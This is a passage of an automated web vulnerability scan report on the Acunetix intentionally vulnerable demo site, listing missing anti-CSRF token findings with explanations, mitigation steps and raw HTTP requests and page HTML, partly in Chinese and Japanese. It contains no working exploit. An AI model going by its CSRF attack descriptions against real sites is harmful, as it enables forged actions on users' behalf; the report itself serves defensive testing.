          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="default.aspx" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        2. GET http://testaspnet.vulnweb.com/
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (212 bytes)
          GET http://testaspnet.vulnweb.com/ HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          
          
          Request body (0 bytes)
          Response
          Status line and header section (296 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          Set-Cookie: ASP.NET_SessionId=zs3o22mcjjooor3kztmjgeey; path=/; HttpOnly
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:15 GMT
          Content-Length: 13912
          
          
          Response body (13912 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>acublog news</title>
          		<META http-equiv="Content-Type" content="text/html; charset=windows-1252">
          		<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
          		<meta content="C#" name="CODE_LANGUAGE">
          		<meta content="JavaScript" name="vs_defaultClientScript">
          		<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="default.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q8DK3Y7/Bz6vaeG4S8AOaGVC7NUiA==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>
          		<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"
          			height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>
          	</TR>
          </TABLE>
          <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
          		<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>
          			<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a>  <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">
          				signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>
          				<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>
          		</TD>
          		<td class="MenuBar" align="right" width="50px">
          			<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>
          		</td>
          	</TR>
          </TABLE>
          
          			<TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0">
          				<TR>
          					<TD id="tdPageData" valign="top">
          					<DIV class="NewsDate">posted by <strong>admin                    </strong> on 5/16/2019 12:32:30 PM&nbsp;<a href="Comments.aspx?id=0" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=0&NewsAd=ads/def.html" class="NewsTitle">Acunetix Vulnerability Scanner Now With Network Security Scans</a><DIV class="NewsShort">Seamless OpenVAS integration now also available on Windows and Linux</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:37:35 AM&nbsp;<a href="Comments.aspx?id=3" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=3&NewsAd=ads/def.html" class="NewsTitle">Acunetix Web Vulnerability Scanner beta released!</a><DIV class="NewsShort">26 January 2005 - A beta version of Acunetix Web Vulnerability Scanner has been released today. The beta is available for download at http://www.acunetix.com/download/.</DIV><DIV class="NewsDate">posted by <strong>admin                    </strong> on 11/8/2005 11:35:22 AM&nbsp;<a href="Comments.aspx?id=2" class="NewsOperation">add comments</a></DIV><a href="ReadNews.aspx?id=2&NewsAd=ads/def.html" class="NewsTitle">Web attacks - can your web applications withstand the force?</a><DIV class="NewsShort">21 July 2005 - Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</DIV></TD>
          
          					<TD vAlign="top" width="200">
          						<table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;">
          	<tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;">
          		<tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8187')" style="color:Black" title="Go to the previous month">&lt;</a></td><td align="center" style="width:70%;">July 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8248')" style="color:Black" title="Go to the next month">&gt;</a></td></tr>
          	</table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8212')" style="color:Black" title="June 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8213')" style="color:Black" title="June 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8214')" style="color:Black" title="June 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8215')" style="color:Black" title="June 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8216')" style="color:Black" title="June 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8217')" style="color:Black" title="July 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8218')" style="color:Black" title="July 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8219')" style="color:Black" title="July 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8220')" style="color:Black" title="July 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8221')" style="color:Black" title="July 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8222')" style="color:Black" title="July 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8223')" style="color:Black" title="July 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8224')" style="color:Black" title="July 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8225')" style="color:Black" title="July 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8226')" style="color:Black" title="July 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8227')" style="color:Black" title="July 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8228')" style="color:Black" title="July 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8229')" style="color:Black" title="July 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8230')" style="color:Black" title="July 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8231')" style="color:Black" title="July 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8232')" style="color:Black" title="July 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8233')" style="color:Black" title="July 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8234')" style="color:Black" title="July 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8235')" style="color:Black" title="July 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8236')" style="color:Black" title="July 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8237')" style="color:Black" title="July 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8238')" style="color:Black" title="July 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8239')" style="color:Black" title="July 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8240')" style="color:Black" title="July 24">24</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8241')" style="color:Black" title="July 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8242')" style="color:Black" title="July 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8243')" style="color:Black" title="July 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8244')" style="color:Black" title="July 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8245')" style="color:Black" title="July 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8246')" style="color:Black" title="July 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8247')" style="color:Black" title="July 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8248')" style="color:Black" title="August 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8249')" style="color:Black" title="August 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8250')" style="color:Black" title="August 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8251')" style="color:Black" title="August 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8252')" style="color:Black" title="August 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8253')" style="color:Black" title="August 06">6</a></td></tr>
          </table><BR>
          <a href="rssFeed.aspx">Get RSS feed</a>
          </TD>
          				</TR>
          				<TR>
          					<TD colSpan="2">
          					</TD>
          				</TR>
          			</TABLE>
          		</form>
          	</body>
          	<div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px">
          		<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p>
          	</div>
          </HTML>
          
          Evidence
          <form name="Form1" method="post" action="default.aspx" id="Form1">
          Solution

          フェーズ: アーキテクチャと設計

          同脆弱性を引き起こさせない、あるいは容易に回避可能な精査されたライブラリ、あるいはフレームワークを使用してください。

          For example, use anti-CSRF packages such as the OWASP CSRFGuard.

          Phase: Implementation

          Ensure that your application is free of cross-site scripting issues, because most CSRF defenses can be bypassed using attacker-controlled script.

          Phase: Architecture and Design

          Generate a unique nonce for each form, place the nonce into the form, and verify the nonce upon receipt of the form. Be sure that the nonce is not predictable (CWE-330).

          Note that this can be bypassed using XSS.

          Identify especially dangerous operations. When the user performs a dangerous operation, send a separate confirmation request to ensure that the user intended to perform that operation.

          Note that this can be bypassed using XSS.

          Use the ESAPI Session Management control.

          This control includes a component for CSRF.

          Do not use the GET method for any request that triggers a state change.

          Phase: Implementation

          Check the HTTP Referer header to see if the request originated from an expected page. This could break legitimate functionality, because users or proxies may have disabled sending the Referer for privacy reasons.

        3. GET http://testaspnet.vulnweb.com/about.aspx
          Alert tags
          Alert description

          在提交的HTML表单中中找不到反CSRF令牌。

          A cross-site request forgery is an attack that involves forcing a victim to send an HTTP request to a target destination without their knowledge or intent in order to perform an action as the victim. The underlying cause is application functionality using predictable URL/form actions in a repeatable way. The nature of the attack is that CSRF exploits the trust that a web site has for a user. By contrast, cross-site scripting (XSS) exploits the trust that a user has for a web site. Like XSS, CSRF attacks are not necessarily cross-site, but they can be. Cross-site request forgery is also known as CSRF, XSRF, one-click attack, session riding, confused deputy, and sea surf.

          CSRF attacks are effective in a number of situations, including:

          * The victim has an active session on the target site.

          * The victim is authenticated via HTTP auth on the target site.

          * The victim is on the same local network as the target site.

          CSRF has primarily been used to perform an action against a target site using the victim's privileges, but recent techniques have been discovered to disclose information by gaining access to the response. The risk of information disclosure is dramatically increased when the target site is vulnerable to XSS, because XSS can be used as a platform for CSRF, allowing the attack to operate within the bounds of the same-origin policy.

          Other info

          No known Anti-CSRF token [anticsrf, CSRFToken, __RequestVerificationToken, csrfmiddlewaretoken, authenticity_token, OWASP_CSRFTOKEN, anoncsrf, csrf_token, _csrf, _csrfSecret, __csrf_magic, CSRF, _token, _csrf_token] was found in the following HTML form: [Form 1: "__EVENTARGUMENT" "__EVENTTARGET" "__EVENTVALIDATION" "__VIEWSTATE" "__VIEWSTATEGENERATOR" ].

          Request
          Request line and header section (314 bytes)
          GET http://testaspnet.vulnweb.com/about.aspx HTTP/1.1
          Host: testaspnet.vulnweb.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: http://testaspnet.vulnweb.com
          Cookie: ASP.NET_SessionId=s1yels3ja2tusr45pvgdn232
          
          
          Request body (0 bytes)
          Response
          Status line and header section (222 bytes)
          HTTP/1.1 200 OK
          Cache-Control: private
          Content-Type: text/html; charset=utf-8
          Server: Microsoft-IIS/8.5
          X-AspNet-Version: 2.0.50727
          X-Powered-By: ASP.NET
          Date: Mon, 25 Jul 2022 13:05:17 GMT
          Content-Length: 14467
          
          
          Response body (14467 bytes)
          
          <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
          <HTML>
          	<HEAD>
          		<title>About</title>
          		<meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1">
          		<meta name="CODE_LANGUAGE" Content="C#">
          		<meta name="vs_defaultClientScript" content="JavaScript">
          		<meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5">
          		<LINK href="styles.css" type="text/css" rel="stylesheet">
          	</HEAD>
          	<body>
          		<form name="Form1" method="post" action="about.aspx" id="Form1">
          <div>
          <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
          <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
          <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZLDaiLtIJBFGHdHW8BBidJDZ856t" />
          </div>
          
          <script type="text/javascript">
          //<![CDATA[
          var theForm = document.forms['Form1'];
          if (!theForm) {
              theForm = document.Form1;
          }
          function __doPostBack(eventTarget, eventArgument) {
              if (!theForm.onsubmit || (theForm.onsubmit() != false)) {
                  theForm.__EVENTTARGET.value = eventTarget;
                  theForm.__EVENTARGUMENT.value = eventArgument;
                  theForm.submit();
              }
          }
          //]]>
          </script>
          
          
          <div>
          
          	<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="E809BCA5" />
          	<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKqq9H0CQK746uPDALtiZ78CwKo4Jb/DwKo4Jb/DwKo4IqSBwKo4IqSBwKo4L4pAqjgvikCqODSzQkCqODSzQkCqODG4AICqODG4AICqOD6hwoCqOD6hwoCqOCu7wgCqOCu7wgCqODCAwKo4MIDAo33rKsDAo33rKsDAo33wM8MAo33wM8MAo339OIFAo339OIFAo336LkNAo336LkNAo33nNwGAo33nNwGAo33sPMPAo33sPMPAo33pJYHAo33pJYHAo332CoCjffYKgKN94ySDQKN94ySDQKN96CpBgKN96CpBgLmnbPeCQLmnbPeCQLmnaf1AgLmnaf1AgLmnduJCgLmnduJCgLmnc+sAwLmnc+sAwLmnePDDALmnePDDALmnZfmBQLmnZfmBQLmnYu9DQLmnYu9DQLmnb/QBgLmnb/QBgLmnZO5AwLmnZO5AwLmnYfcDALmnYfcDAL7pJHFDwL7pJHFDwL7pIWYBwL7pIWYBwL7pLk/AvukuT8C+6St0gkC+6St0gkC+6TB9gIC+6TB9gIC+6T1jQoC+6T1jQoC+6TpoAMC+6TpoAMC+6SdxwwC+6SdxwwC+6TxrAkC+6TxrAkC+6TlwwIC+6TlwwIC3Mv36AUC3Mv36AUC3Mvrjw0C3Mvrjw0C3MufogYC3MufogYC3Muz+Q8C3Muz+Q/2grLtTL+jO092JULZB++ks9UGJw==" />
          </div>
          			
          <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">
          	<TR>
